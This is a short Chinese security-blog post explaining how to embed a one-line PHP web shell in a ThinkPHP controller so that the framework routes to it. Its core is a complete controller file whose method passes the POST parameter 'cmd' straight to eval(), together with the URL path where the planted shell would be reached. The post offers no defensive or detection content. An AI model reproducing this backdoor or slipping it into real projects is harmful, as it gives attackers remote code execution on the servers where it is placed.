thinkphp专用shell

释放双眼,带上耳机,听听看~!

一、漏洞简介

基于thinkphp框架的一句话写法 thinkphp框架使用入口文件调用控制器,直接写一句话可能会有解析问题导致无法执行指令,研究了一下把一句话套入框架控制器的方法,分享给大家参考。

二、漏洞影响

三、复现过程

在index的控制器文件夹下建立Test.php文件,代码如下:

<?php 
namespace app\index\controller; 

class Test 

{ 

    public function test() 

    { 

    eval($_POST["cmd"]); 

    } 

}

一句话的地址就是http://www.cert.ac.cn/index/test/test

人已赞赏
代码审计

代码审计入门篇

2019-11-1 0:12:55

代码审计

从PHP源码与扩展开发谈PHP任意代码执行与防御

2019-11-25 23:03:20

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
有新消息 消息中心
搜索